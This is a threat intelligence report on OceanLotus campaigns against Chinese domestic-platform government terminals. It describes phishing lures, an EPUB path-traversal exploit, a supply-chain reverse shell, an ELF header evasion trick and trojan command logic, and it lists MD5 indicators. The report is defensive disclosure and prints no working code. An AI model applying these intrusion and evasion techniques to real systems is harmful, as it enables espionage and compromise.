Overview

In 2022, the RedDrip team of the QiAnXin Threat Intelligence Center first disclosed in the Operation Typhoon^[1] report the attack cases by the OceanLotus group targeting domestic information innovation (indigenous innovation) systems. Given the low prevalence of indigenous innovation terminals at that time and the fact that these devices often store sensitive government information, we only issued a warning about this attack trend. In the following years, we further monitored multiple attack groups, including APT-Q-95, UTG-Q-008, and an unknown organization, continuously targeting indigenous innovation platforms and government networks. Their core purpose is to steal government data, probe national policies, and future development strategies.

Similar to 2022, OceanLotus chose the same Trojan used in Operation Hurricane^[2] to simultaneously attack both Windows and indigenous innovation platforms, delivering spear-phishing emails in formats such as lnk, desktop, jar, epub, etc. Notably, in the October-November 2025 attack activities on the Windows platform, OceanLotus seemed to suffer from "TianQing PTSD." The latest loader specifically checks whether TianQing-related processes exist in the victim's processes, and if so, it exits directly. The attackers have inadvertently solved the world's problem of users clicking "allow" after the TianQing Hex Engine's startup interception prompt.

In fact, TianQing V10 for indigenous innovation platforms can now alert on spear-phishing baits such as desktop files. We recommend that TianQing V8 users for indigenous innovation platforms upgrade to V10 and enable the cloud-based scanning function to defend against traditional tactics.

Attack Surface

In addition to the internal network terminal supply chain, the current attack methods targeting indigenous innovation platforms are no different from those targeting Linux desktops, with significant technical homogeneity. Therefore, the core issue is: how do foreign intelligence agencies accurately identify which units' email addresses have migrated to the indigenous innovation environment during this wave of indigenous innovation replacement? According to the intelligence we have, the OceanLotus group currently cannot achieve precise phishing. Its strategy mainly relies on email probes and document probes for exclusion and screening, ultimately increasing the attack success rate through mass phishing emails.

Desktop Bait

Desktop files on indigenous innovation platforms are similar to LNK files on Windows platforms and are the most common bait format for Linux systems, which have been used by foreign organizations such as APT36 in attacks targeting India.

After the victim double-clicks, the command under the Exec field will be executed.

The command generally creates a scheduled task to continuously request the C2 server, waiting for the issuance of the second-stage payload.

PDF baits are usually in compressed packages, but there are also cases of directly invoking WPS in the indigenous innovation system to open remote documents:

JAR Bait

Most government indigenous innovation terminals have default installations of environments such as Java and Python, which can directly run JAR and PY scripts. In early 2025, OceanLotus delivered attachments such as "The Path of FTAAP and China's Solution.jar," "Project Proposal Review Report Approval Form (General Form).docx.jar," and "Energy Supply and Demand Report.xls.jar."

It will determine whether the current terminal is a Linux system. If so, it will release the downloader.report-scheduler-1.0-SNAPSHOT.jar and create a scheduled task.

Opening the bait document:

epub File Vulnerability

In mid-2025, OceanLotus delivered EPUB files with Nday vulnerabilities:

After analysis, it was found to be the Atril EPUB path traversal vulnerability exposed in January 2024:

It releases the desktop-service-7803.desktop file in the autostart directory to achieve persistence and the .icWpnBHQc0Ka.desktop file in the .config directory. The .desktop file decrypts .icWpnBHQc0Ka, which ultimately runs the Python downloader.

The vulnerability reproduction effect is as follows:

Internal Network Supply Chain

Similar to the 2024 Windows platform security terminal distribution, it involves multiple domestic software products with terminal management functions. OceanLotus entered the internal network through spear-phishing emails, then attempted to brute-force the internal network security indigenous innovation server but failed. After nearly a month, it is suspected that the server was compromised through a 0day exploit, and malicious update scripts were distributed to both internal network indigenous innovation terminals and Windows terminals. The malicious update script for the indigenous innovation terminal is as follows:

Using Openssl to achieve a reverse shell, followed by the issuance of the second-stage sample. This is also the first known supply chain attack incident on the domestic indigenous innovation platform.

The malicious update component for the Windows terminal is as follows:

Weapon Introduction

Customized Trojan for Indigenous Innovation Platforms

The ELF Trojan released by the OceanLotus group on indigenous innovation platforms has slight differences from traditional Linux ELF files:

This indigenous innovation Trojan achieves a precise compatibility attack by zeroing out the three bytes following the ELF file Magic Number (used to identify bitness, endianness, and version). This results in traditional Linux systems refusing to execute the file due to format errors, while the indigenous innovation platform can parse and run it normally. This carefully designed detail fully demonstrates OceanLotus's in-depth understanding of the underlying operation mechanism of domestic indigenous innovation systems.

The core logic of the ELF Trojan is consistent with the Rust Trojan in Operation Hurricane^[2] .

OceanLotus has been pursuing the shellcode-ization of PE files in its Trojans, and this is also the case for indigenous innovation platforms. In the latest attack activities, the Trojans have begun to use multi-layer encryption nesting, ultimately executing the shellcode-ized Rust Trojan.

Lightweight Trojan

To adapt to internal network supply chain attacks, the OceanLotus group has designed various lightweight Trojans, most of which use custom protocols with relatively simple commands, and are likely to be one-time-use Trojans.

Type One (Internal Network Node)

This Trojan reconnects to the internal network security server's IP port 15001 using a custom protocol, supporting two remote commands: ping and init. When the ping command is sent, the server replies with "pong." When init is sent, the received shellcode is executed via CreateThread.

Type Two

An ELF Trojan packaged by PyInstaller, which reads the configuration file in the same directory:

It calls the sign function for decryption:

After decryption, it calls the protect function to enter the main logic:

It splits the decrypted data into remote IP (d) and port (c), reconnecting using the SSL protocol:

It splits the data received from the C2 server and judges the branch commands:

The core function is to execute the commands passed by the attacker using the subprocess.check_output function.

Passive Backdoor Targeting IoT Devices

When OceanLotus infiltrated domestic border routers, it implanted an open-source passive backdoor and set up portmap port forwarding to an external C2 server, similar to the previously disclosed Operation OceanStorm^[3].

After analysis, it was found to be the open-source project apache2_BackdoorMod:

It listens on the local port 32227:

IOC

Md5

31d2192170e92579779b30aea102c121

9c70b4d193aaf41241d86fb45920564c

bc99b603530609d7b6f40c7f912fbe2e

7b9f197532d342af5244ef1d3f2e9f4d

a898d4d6e24a4612effa2b13d885fe99

5cfb68302f0736754906442185b2c0d5

3ae561425ac07975fdf4cd1d9c893534

e1e3da8296ea93b3b4f49c959c6f6815

467f39b8c0efad1202fcd111005a6f03

Reference Links

[1] https://ti.qianxin.com/blog/articles/peeking-at-the-cyber-sea-lotus-of-the-nine-dash-line-in-the-south-china-sea/

[2] https://ti.qianxin.com/blog/articles/operation-hurricane-a-brief-discussion-of-the-techniques-and-tactics-of-the-new-oceanlotus-group-in-memory-cn/

[3] https://ti.qianxin.com/blog/articles/Operation-OceanStorm:The-OceanLotus-hidden-under-the-abyss-of-the-deep/